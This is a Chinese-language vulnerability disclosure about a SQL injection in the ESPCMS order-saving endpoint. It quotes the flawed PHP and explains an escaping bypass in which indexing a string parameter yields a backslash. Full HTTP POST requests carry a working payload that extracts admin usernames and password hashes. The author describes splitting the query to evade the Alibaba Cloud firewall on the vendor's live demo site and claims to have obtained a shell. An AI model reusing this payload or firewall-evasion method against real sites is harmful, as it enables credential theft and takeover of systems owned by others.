易思ESPCMS sql注入漏洞(绕过阿里云盾demo站成功拿下shell)

漏洞作者:

路人甲

详细说明:

/interface/order.php

$db_values = '';
			$arraycount = count($did) - 1;
			foreach ($did as $key => $value) {
				$value = intval($value);
				$oprice[$key] = floatval($oprice[$key]);
				$bprice[$key] = floatval($bprice[$key]);
				$countprice[$key] = floatval($countprice[$key]);
				$amount[$key] = intval($amount[$key]);
				if ($key == $arraycount) {
					$db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1)";
				} else {
					$db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1),";
				}
			}
			$db_field = 'oid,did,tsn,title,oprice,bprice,countprice,amount,inventory';
			$this->db->query('INSERT INTO ' . $db_table2 . ' (' . $db_field . ') VALUES ' . $db_values);
 

$ptitle,$tsn都可控,直接带入insert。

正常提交

POST /index.php?ac=order&at=ordersave HTTP/1.1
Host: demo.ecisp.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.ecisp.cn/index.php?ac=order&at=orderpay
Cookie: /**/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 426

userid=409&productmoney=33600&discount_productmoney=33600&discountmoney=0&tokenkey=98b9b2dbbda63c317b3f9ab9c370a47b&ptitle%5B%5D=ESPCMS%E5%BC%80%E5%8F%91%E7%89%88&tsn%5B%5D=SN20140706215345387&bprice%5B%5D=16800.00&oprice%5B%5D=16800.00&did%5B%5D=30&amount%5B%5D=2&countprice%5B%5D=33600.00&osid=1&opid=1&alias=wooyun&sex=0&email=asd%40qq.com&tel=123&mobile=123&address=test&zipcode=0&sendtime=1&content=&invpayee=&invcontent=
$ptitle = $this->fun->accept('ptitle', 'P');
$tsn = $this->fun->accept('tsn', 'P');
 

来看看accept()

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {
		switch ($var) {
			case 'G':
				$var = &$_GET;
				break;
			case 'P':
				$var = &$_POST;
				break;
 
case 'C': $var = &$_COOKIE; break; case 'R': $var = &$_GET; if (empty($var[$k])) { $var = &$_POST; } break; } $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL; return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue; }
 

这里会把提交的数据转义,但是当$tsn不是数组的时候是这样的

$temp = "wooyun"

$temp[0]的值为w

playload构造:

$tsn参数提交一个' daddslashes(espcms重写的addslashes)将其转义成\'

取$tsn[0],为\

userid=1&productmoney=16800&discount_productmoney=16800&discountmoney=0&ptitle[]=,(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#&tsn='&bprice[]=16800.00&oprice[]=16800.00&did[]=30&amount[]=1&countprice[]=16800.00&osid=1&opid=1&alias=wooyun&sex=0&email=awsedr@q.com&tel=10010&mobile=&address=china&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

查看订单:

171830126998f324f27517baa37e7f6a12b0e5fc[1]

sql语句相当于

INSERT INTO espcms_order_info (oid,did,tsn,title,oprice,bprice,countprice,amount,inventory) VALUES (10,30,'\',',(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#',16800,16800,16800,1,1)
 

官方DEMO测试:

由于官方demo有阿里的防火墙,我就分两次来获取

第一条
SELECT USERNAME FROM espcms_admin_member
第二条:
SELECT PASSWORD FROM espcms_admin_member

1718342633376853c7240bced1343b4e3be2343d[1]

发表评论